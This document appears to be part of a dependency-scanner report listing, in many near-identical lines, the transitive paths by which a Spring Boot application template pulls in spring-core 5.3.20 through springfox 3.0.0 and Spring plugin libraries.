  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
